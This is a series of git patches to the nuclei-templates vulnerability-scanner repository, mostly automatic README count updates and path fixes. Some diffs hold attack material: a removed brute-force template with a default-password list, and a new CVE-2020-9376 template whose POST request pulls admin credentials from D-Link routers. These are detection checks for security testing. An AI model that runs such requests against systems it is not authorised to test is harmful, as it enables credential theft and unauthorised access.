 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
@@ -25,6 +26,7 @@ An overview of the nuclei template directory including number of templates and H
 
 
 ### Nuclei templates `{version}` tree overview
+-----
 
 <details>
 <summary> Nuclei templates </summary>
@@ -37,12 +39,25 @@ An overview of the nuclei template directory including number of templates and H
 
 **{command("tree", -2, None)}**.
 
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
+📖 Documentation
+-----
+
+Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
+
+💪 Contributions
+-----
+
+Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
+
+👨‍💻 Community
+-----
+
+You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
+
+💡 Notes
+-----
+-  Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
 
-------
-**Notes:** 
-1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests.
-2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
 
 Thanks again for your contribution and keeping the community vibrant. :heart:
 """
\ No newline at end of file

From 540da369d054f40edd39f7d79d1081e6682fef9e Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 11 Jan 2021 09:17:15 +0000
Subject: [PATCH 48/85] Auto Update README [Mon Jan 11 09:17:15 UTC 2021]
 :robot:

---
 README.md | 25 ++++++++++++++++++++-----
 1 file changed, 20 insertions(+), 5 deletions(-)

diff --git a/README.md b/README.md
index 5b4b264cbb..0dfbc1a18c 100644
--- a/README.md
+++ b/README.md
@@ -12,6 +12,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
 
 ### Nuclei templates `v7.3.7` overview
+------
 
 | Templates       | Counts                          | Templates        | Counts                         |
 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
@@ -25,6 +26,7 @@ An overview of the nuclei template directory including number of templates and H
 
 
 ### Nuclei templates `v7.3.7` tree overview
+-----
 
 <details>
 <summary> Nuclei templates </summary>
@@ -566,11 +568,24 @@ An overview of the nuclei template directory including number of templates and H
 
 **53 directories, 477 files**.
 
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
+📖 Documentation
+-----
+
+Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
+
+💪 Contributions
+-----
+
+Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
+
+👨‍💻 Community
+-----
+
+You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
+
+💡 Notes
+-----
+-  Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
 
-------
-**Notes:** 
-1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests.
-2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
 
 Thanks again for your contribution and keeping the community vibrant. :heart:

From 3c90d959d5fee8aefd8f76d3d284a4bb35ff3c5d Mon Sep 17 00:00:00 2001
From: Zhenya Savushkin <savik94mail@gmail.com>
Date: Mon, 11 Jan 2021 11:45:51 +0200
Subject: [PATCH 49/85] fix grafana subtemplate location

---
 workflows/grafana-workflow.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml
index 92d69b997f..7438d10b96 100644
--- a/workflows/grafana-workflow.yaml
+++ b/workflows/grafana-workflow.yaml
@@ -13,4 +13,4 @@ workflows:
   - template: exposed-panels/grafana-detect.yaml
 
     subtemplates:
-      - template: default-logins/grafana-default-credential.yaml
\ No newline at end of file
+      - template: default-logins/grafana/grafana-default-credential.yaml

From 891c3d373610058b5a02b0818a208e55e0fb9f97 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 15:18:37 +0530
Subject: [PATCH 50/85] path updates

---
 workflows/rabbitmq-workflow.yaml         | 2 +-
 workflows/solarwinds-orion-workflow.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml
index 349ce0f23b..4a606cd24c 100644
--- a/workflows/rabbitmq-workflow.yaml
+++ b/workflows/rabbitmq-workflow.yaml
@@ -13,4 +13,4 @@ workflows:
   - template: exposed-panels/rabbitmq-dashboard.yaml
 
     subtemplates:
-      - template: default-logins/rabbitmq-default-admin.yaml
\ No newline at end of file
+      - template: default-logins/rabbitmq/rabbitmq-default-admin.yaml
\ No newline at end of file
diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml
index 654c9f341e..980148284e 100644
--- a/workflows/solarwinds-orion-workflow.yaml
+++ b/workflows/solarwinds-orion-workflow.yaml
@@ -13,4 +13,4 @@ workflows:
     subtemplates:
       - template: cves/2018/CVE-2018-19386.yaml
       - template: cves/2020/CVE-2020-10148.yaml
-      - template: default-logins/solarwinds-default-admin.yaml
\ No newline at end of file
+      - template: default-logins/solarwinds/solarwinds-default-admin.yaml
\ No newline at end of file

From 29803150301fa2217c5ef325e67269672aad0603 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 15:25:10 +0530
Subject: [PATCH 51/85] moving basic-auth-bruteforce to another branch as it
 requires more work

---
 fuzzing/basic-auth-bruteforce.yaml | 98 ------------------------------
 1 file changed, 98 deletions(-)
 delete mode 100644 fuzzing/basic-auth-bruteforce.yaml

diff --git a/fuzzing/basic-auth-bruteforce.yaml b/fuzzing/basic-auth-bruteforce.yaml
deleted file mode 100644
index 3ec202210b..0000000000
--- a/fuzzing/basic-auth-bruteforce.yaml
+++ /dev/null
@@ -1,98 +0,0 @@
-id: basic-auth-bruteforce
-
-info:
-  name: Basic Auth Bruteforce
-  author: w4cky_
-  severity: high
-
-  # Impotent Notes:-
-  # This is specific template to work with basic 401 authentication endpoint.
-  # Do not run this template on non basic authentication related endpoints to avoid false positive results.
-
-requests:
-
-  - payloads:
-      username:
-        - admin
-        - manager
-        - administrator
-        - username
-        - login
-        - anonymous
-        - test
-        - guest
-        - root
-        - demo
-
-      password:
-        - admin
-        - pass1
-        - pass1
-        - root
-        - welcome
-        - p@ssw0rd
-        - user
-        - test
-        - testest
-        - dupa8
-        - admin123
-        - admin1234
-        - admin12345
-        - anonymous
-        - manager
-        - linux
-        - system
-        - oracle
-        - administrator
-        - 11111111
-        - qwerty123
-        - cisco123
-        - admin123456
-        - 1qazXSW@
-        - master
-        - 123qweasd
-        - 1qaz2wsx
-        - 123456789
-        - 1234567890
-        - !qaz@wsx
-        - !q@w
-        - wubao
-        - pa55w0rd
-        - 123abc
-        - 123456
-        - 123456789
-        - qwerty
-        - password
-        - 1111111
-        - 12345678
-        - abc123
-        - 1234567
-        - password1
-        - 12345
-        - 1234567890
-        - 123123
-        - 000000
-        - Iloveyou
-        - 1234
-        - 1q2w3e4r5t
-        - Qwertyuiop
-        - 123
-        - Monkey
-        - Dragon
-        - demo
-
-    attack: clusterbomb
-
-    raw:
-      - |
-        GET /protected HTTP/1.1
-        Host: {{Hostname}}
-        Authorization: Basic {{base64(username + ':' + password)}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
-        Accept-Language: en-US,en;q=0.9
-        Connection: close
-
-    matchers:
-      - type: status
-        status:
-          - 200
\ No newline at end of file

From afee90df5be527b19184d9c1d36dc88cb1480cad Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 11 Jan 2021 09:55:51 +0000
Subject: [PATCH 52/85] Auto Update README [Mon Jan 11 09:55:51 UTC 2021]
 :robot:

---
 README.md | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index 0dfbc1a18c..83b117d3e9 100644
--- a/README.md
+++ b/README.md
@@ -19,7 +19,7 @@ An overview of the nuclei template directory including number of templates and H
 | cves            | 154            | default-logins   | 8 |
 | dns             | 6               | exposed-panels   | 72   |
 | exposed-tokens  | 9  | exposures        | 41      |
-| fuzzing         | 6           | helpers          | 3        |
+| fuzzing         | 5           | helpers          | 3        |
 | miscellaneous   | 14     | misconfiguration | 37 |
 | takeovers       | 1         | technologies     | 44     |
 | vulnerabilities | 62 | workflows        | 17        |
@@ -358,7 +358,6 @@ An overview of the nuclei template directory including number of templates and H
 │       └── trace-axd-detect.yaml
 ├── fuzzing
 │   ├── arbitrary-file-read.yaml
-│   ├── basic-auth-bruteforce.yaml
 │   ├── directory-traversal.yaml
 │   ├── generic-lfi-fuzzing.yaml
 │   ├── iis-shortname.yaml
@@ -566,7 +565,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**53 directories, 477 files**.
+**53 directories, 476 files**.
 
 📖 Documentation
 -----

From 389477dd283da20ff4d827cbd71881215699d8cb Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Tue, 12 Jan 2021 11:47:44 +0530
Subject: [PATCH 53/85] removing duplicate template

---
 exposures/configs/exposed-alps-spring.yaml | 30 ----------------------
 1 file changed, 30 deletions(-)
 delete mode 100644 exposures/configs/exposed-alps-spring.yaml

diff --git a/exposures/configs/exposed-alps-spring.yaml b/exposures/configs/exposed-alps-spring.yaml
deleted file mode 100644
index dea715883a..0000000000
--- a/exposures/configs/exposed-alps-spring.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: exposed-alps-spring
-
-info:
-  name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS)
-  author: dwisiswant0
-  severity: medium
-  reference: https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/profile"
-      - "{{BaseURL}}/api/profile"
-      - "{{BaseURL}}/alps/profile"
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "_links"
-          - "/alps/"
-          - "profile"
-        condition: and
-        part: body
-      - type: word
-        words:
-          - "application/hal+json"
-        part: header
-      - type: status
-        status:
-          - 200
\ No newline at end of file

From 77ae542dd15093e94ca15007e0920157528bc724 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 12 Jan 2021 06:24:23 +0000
Subject: [PATCH 54/85] Auto Update README [Tue Jan 12 06:24:23 UTC 2021]
 :robot:

---
 README.md | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/README.md b/README.md
index 83b117d3e9..81defd02aa 100644
--- a/README.md
+++ b/README.md
@@ -11,21 +11,21 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 
 An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
 
-### Nuclei templates `v7.3.7` overview
+### Nuclei templates `v7.3.8` overview
 ------
 
 | Templates       | Counts                          | Templates        | Counts                         |
 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
 | cves            | 154            | default-logins   | 8 |
 | dns             | 6               | exposed-panels   | 72   |
-| exposed-tokens  | 9  | exposures        | 41      |
+| exposed-tokens  | 9  | exposures        | 40      |
 | fuzzing         | 5           | helpers          | 3        |
 | miscellaneous   | 14     | misconfiguration | 37 |
 | takeovers       | 1         | technologies     | 44     |
 | vulnerabilities | 62 | workflows        | 17        |
 
 
-### Nuclei templates `v7.3.7` tree overview
+### Nuclei templates `v7.3.8` tree overview
 -----
 
 <details>
@@ -322,7 +322,6 @@ An overview of the nuclei template directory including number of templates and H
 │   │   ├── amazon-docker-config-disclosure.yaml
 │   │   ├── ansible-config-disclosure.yaml
 │   │   ├── composer-config.yaml
-│   │   ├── exposed-alps-spring.yaml
 │   │   ├── exposed-svn.yaml
 │   │   ├── git-config-nginxoffbyslash.yaml
 │   │   ├── git-config.yaml
@@ -565,7 +564,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**53 directories, 476 files**.
+**53 directories, 475 files**.
 
 📖 Documentation
 -----

From 33bc9f554a128c95e32d52e48a421fdb7aa275b1 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Tue, 12 Jan 2021 13:27:56 +0530
Subject: [PATCH 55/85] readme updates

---
 .github/scripts/README.tmpl | 26 +++++++++++++++++++++-----
 1 file changed, 21 insertions(+), 5 deletions(-)

diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl
index 4d10939eda..bf8219ee55 100644
--- a/.github/scripts/README.tmpl
+++ b/.github/scripts/README.tmpl
@@ -9,10 +9,22 @@ f"""
 
 Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
 
-An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
+# Resources
 
-### Nuclei templates `{version}` overview
-------
+- [Templates](#nuclei-templates-overview)
+- [Documentation](#-documentation)
+- [Contributions](#-contributions)
+- [Discussion](#-discussion)
+- [Community](#-community)
+- [Notes](#-notes)
+
+### Nuclei templates overview
+-----
+
+An overview of the nuclei template directory including number of templates associated with each directory. 
+
+
+**Directory structure of nuclei templates:**
 
 | Templates       | Counts                          | Templates        | Counts                         |
 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
@@ -25,8 +37,7 @@ An overview of the nuclei template directory including number of templates and H
 | vulnerabilities | {countTpl("vulnerabilities/*")} | workflows        | {countTpl("workflows")}        |
 
 
-### Nuclei templates `{version}` tree overview
------
+**Tree structure of nuclei templates:**
 
 <details>
 <summary> Nuclei templates </summary>
@@ -49,6 +60,11 @@ Please navigate to https://nuclei.projectdiscovery.io for detailed documentation
 
 Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
 
+💬 Discussion
+-----
+
+Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
+
 👨‍💻 Community
 -----
 

From 4001d8f9677da5db7b5740ee1468b9fa54a13321 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 12 Jan 2021 07:58:38 +0000
Subject: [PATCH 56/85] Auto Update README [Tue Jan 12 07:58:38 UTC 2021]
 :robot:

---
 README.md | 26 +++++++++++++++++++++-----
 1 file changed, 21 insertions(+), 5 deletions(-)

diff --git a/README.md b/README.md
index 81defd02aa..27571ae44f 100644
--- a/README.md
+++ b/README.md
@@ -9,10 +9,22 @@
 
 Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
 
-An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
+# Resources
 
-### Nuclei templates `v7.3.8` overview
-------
+- [Templates](#nuclei-templates-overview)
+- [Documentation](#-documentation)
+- [Contributions](#-contributions)
+- [Discussion](#-discussion)
+- [Community](#-community)
+- [Notes](#-notes)
+
+### Nuclei templates overview
+-----
+
+An overview of the nuclei template directory including number of templates associated with each directory. 
+
+
+**Directory structure of nuclei templates:**
 
 | Templates       | Counts                          | Templates        | Counts                         |
 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
@@ -25,8 +37,7 @@ An overview of the nuclei template directory including number of templates and H
 | vulnerabilities | 62 | workflows        | 17        |
 
 
-### Nuclei templates `v7.3.8` tree overview
------
+**Tree structure of nuclei templates:**
 
 <details>
 <summary> Nuclei templates </summary>
@@ -576,6 +587,11 @@ Please navigate to https://nuclei.projectdiscovery.io for detailed documentation
 
 Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
 
+💬 Discussion
+-----
+
+Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
+
 👨‍💻 Community
 -----
 

From d8fc0079d96829b0759a19e791ee4b03bba4e5b0 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Tue, 12 Jan 2021 21:45:12 +0530
Subject: [PATCH 57/85] Adding CVE-2020-9376

---
 cves/2020/CVE-2020-9376.yaml | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 cves/2020/CVE-2020-9376.yaml

diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml
new file mode 100644
index 0000000000..7d671b3333
--- /dev/null
+++ b/cves/2020/CVE-2020-9376.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-9376
+
+info:
+  name: D-Link Information Disclosure via getcfg.php
+  author: whynotke
+  severity: high
+  description: |
+    D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
+    NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
+
+    References:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9376
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/getcfg.php"
+
+    body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<name>Admin</name>"
+          - "</usrid>"
+          - "</password>"
+        condition: and
+        part: body

From e4018823919b2d487d229a379d9e8e97b9e054ad Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 12 Jan 2021 16:16:29 +0000
Subject: [PATCH 58/85] Auto Update README [Tue Jan 12 16:16:29 UTC 2021]
 :robot:

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 27571ae44f..97ea5862df 100644
--- a/README.md
+++ b/README.md
@@ -28,7 +28,7 @@ An overview of the nuclei template directory including number of templates assoc
 
 | Templates       | Counts                          | Templates        | Counts                         |
 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves            | 154            | default-logins   | 8 |
+| cves            | 155            | default-logins   | 8 |
 | dns             | 6               | exposed-panels   | 72   |
 | exposed-tokens  | 9  | exposures        | 40      |
 | fuzzing         | 5           | helpers          | 3        |
@@ -205,6 +205,7 @@ An overview of the nuclei template directory including number of templates assoc
 │       ├── CVE-2020-8982.yaml
 │       ├── CVE-2020-9047.yaml
 │       ├── CVE-2020-9344.yaml
+│       ├── CVE-2020-9376.yaml
 │       ├── CVE-2020-9484.yaml
 │       ├── CVE-2020-9496.yaml
 │       └── CVE-2020-9757.yaml
@@ -575,7 +576,7 @@ An overview of the nuclei template directory including number of templates assoc
 
 </details>
 
-**53 directories, 475 files**.
+**53 directories, 476 files**.
 
 📖 Documentation
 -----

From b5159893d00663359dcd49a184af5cb2ad2b955f Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Wed, 13 Jan 2021 12:40:31 +0530
Subject: [PATCH 59/85] removing duplicate template

---
 vulnerabilities/thinkific-redirect.yaml | 22 ----------------------
 1 file changed, 22 deletions(-)
 delete mode 100644 vulnerabilities/thinkific-redirect.yaml

diff --git a/vulnerabilities/thinkific-redirect.yaml b/vulnerabilities/thinkific-redirect.yaml
deleted file mode 100644
index 17873bceb3..0000000000
--- a/vulnerabilities/thinkific-redirect.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: thinkific-redirect
-
-info:
-  name: Thinkific Open URL Redirect
-  author: Gal Nagli
-  severity: low
-
-requests:
-  - method: GET
-
-    path:
-      - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://example.com"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 302
-      - type: word
-        words:
-          - "<a href=\"http://example.com?kind=jwt&amp;message=Nil+JSON+web+token\""
-        part: body
\ No newline at end of file

From 8427a7167c3e56382bfd433996c6fbd24c856757 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Wed, 13 Jan 2021 07:11:04 +0000
Subject: [PATCH 60/85] Auto Update README [Wed Jan 13 07:11:04 UTC 2021]
 :robot:

---
 README.md | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 97ea5862df..580eeeaad4 100644
--- a/README.md
+++ b/README.md
@@ -534,7 +534,6 @@ An overview of the nuclei template directory including number of templates assoc
 │   ├── springboot
 │   │   ├── springboot-actuators-jolokia-xxe.yaml
 │   │   └── springboot-h2-db-rce.yaml
-│   ├── thinkific-redirect.yaml
 │   ├── vmware
 │   │   ├── vmware-vcenter-lfi-linux.yaml
 │   │   └── vmware-vcenter-lfi.yaml
@@ -576,7 +575,7 @@ An overview of the nuclei template directory including number of templates assoc
 
 </details>
 
-**53 directories, 476 files**.
+**53 directories, 475 files**.
 
 📖 Documentation
 -----

From 106da77fc3aec9f29f0c157bca64d007fda17ee2 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Wed, 13 Jan 2021 13:01:46 +0530
Subject: [PATCH 61/85] Preparing for request clustering

---
 cves/2014/CVE-2014-6271.yaml                       | 2 +-
 cves/2020/CVE-2020-16952.yaml                      | 2 +-
 exposed-panels/kubernetes-dashboard.yaml           | 2 +-
 exposed-panels/webmin-panel.yaml                   | 2 +-
 exposed-panels/zipkin-exposure.yaml                | 2 +-
 exposed-tokens/generic/http-username-password.yaml | 2 +-
 exposures/apis/wadl-api.yaml                       | 2 +-
 miscellaneous/dir-listing.yaml                     | 2 +-
 miscellaneous/trace-method.yaml                    | 4 ++--
 misconfiguration/linkerd-ssrf-detect.yaml          | 2 +-
 misconfiguration/php-errors.yaml                   | 2 +-
 takeovers/subdomain-takeover.yaml                  | 2 +-
 technologies/basic-auth-detection.yaml             | 2 +-
 technologies/cacti-detect.yaml                     | 2 +-
 technologies/google-storage.yaml                   | 2 +-
 technologies/home-assistant.yaml                   | 2 +-
 technologies/kong-detect.yaml                      | 2 +-
 technologies/linkerd-badrule-detect.yaml           | 2 +-
 technologies/mrtg-detect.yaml                      | 2 +-
 technologies/prometheus-exporter-detect.yaml       | 2 +-
 technologies/tech-detect.yaml                      | 2 +-
 vulnerabilities/other/pdf-signer-ssti-to-rce.yaml  | 2 +-
 22 files changed, 23 insertions(+), 23 deletions(-)

diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml
index 6290a01997..0719fd28a2 100644
--- a/cves/2014/CVE-2014-6271.yaml
+++ b/cves/2014/CVE-2014-6271.yaml
@@ -9,7 +9,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
       - "{{BaseURL}}/cgi-bin/status"
       - "{{BaseURL}}/cgi-bin/stats"
       - "{{BaseURL}}/cgi-bin/test"
diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml
index 64051855aa..11be22a053 100644
--- a/cves/2020/CVE-2020-16952.yaml
+++ b/cves/2020/CVE-2020-16952.yaml
@@ -15,7 +15,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers-condition: and
     matchers:
       - type: regex
diff --git a/exposed-panels/kubernetes-dashboard.yaml b/exposed-panels/kubernetes-dashboard.yaml
index 341bd3be10..1aa0892365 100644
--- a/exposed-panels/kubernetes-dashboard.yaml
+++ b/exposed-panels/kubernetes-dashboard.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/webmin-panel.yaml b/exposed-panels/webmin-panel.yaml
index ef6329dbed..7787b28d95 100644
--- a/exposed-panels/webmin-panel.yaml
+++ b/exposed-panels/webmin-panel.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
       - "{{BaseURL}}/webmin/"
     redirects: true
     matchers:
diff --git a/exposed-panels/zipkin-exposure.yaml b/exposed-panels/zipkin-exposure.yaml
index c8b60f1cfa..2ab6e07ca9 100755
--- a/exposed-panels/zipkin-exposure.yaml
+++ b/exposed-panels/zipkin-exposure.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
       - "{{BaseURL}}/zipkin/"
     matchers:
       - type: word
diff --git a/exposed-tokens/generic/http-username-password.yaml b/exposed-tokens/generic/http-username-password.yaml
index 774dfb8497..34eec3fe1b 100644
--- a/exposed-tokens/generic/http-username-password.yaml
+++ b/exposed-tokens/generic/http-username-password.yaml
@@ -13,7 +13,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
 
     extractors:
       - type: regex
diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml
index 83f800b6e1..adf4433d25 100644
--- a/exposures/apis/wadl-api.yaml
+++ b/exposures/apis/wadl-api.yaml
@@ -28,7 +28,7 @@ requests:
         part: body
   - method: OPTIONS
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
       - "{{BaseURL}}/api/v1"
       - "{{BaseURL}}/api/v2"
     matchers:
diff --git a/miscellaneous/dir-listing.yaml b/miscellaneous/dir-listing.yaml
index e5ce749e94..929ab3ed09 100644
--- a/miscellaneous/dir-listing.yaml
+++ b/miscellaneous/dir-listing.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers:
       - type: word
         words:
diff --git a/miscellaneous/trace-method.yaml b/miscellaneous/trace-method.yaml
index df1551e755..8f3069921e 100644
--- a/miscellaneous/trace-method.yaml
+++ b/miscellaneous/trace-method.yaml
@@ -11,7 +11,7 @@ info:
 requests:
   - method: TRACE
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
 
     matchers:
       - type: word
@@ -22,7 +22,7 @@ requests:
 
   - method: OPTIONS
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
 
     matchers:
       - type: regex
diff --git a/misconfiguration/linkerd-ssrf-detect.yaml b/misconfiguration/linkerd-ssrf-detect.yaml
index ad99f869a7..a1d3c16688 100644
--- a/misconfiguration/linkerd-ssrf-detect.yaml
+++ b/misconfiguration/linkerd-ssrf-detect.yaml
@@ -23,7 +23,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     headers:
       l5d-dtab: /svc/* => /$/inet/example.com/443
 
diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml
index 358e2d1bd4..d1682fe207 100644
--- a/misconfiguration/php-errors.yaml
+++ b/misconfiguration/php-errors.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
 
     matchers:
       - type: word
diff --git a/takeovers/subdomain-takeover.yaml b/takeovers/subdomain-takeover.yaml
index 4db0bfe0ed..1c5981edcc 100644
--- a/takeovers/subdomain-takeover.yaml
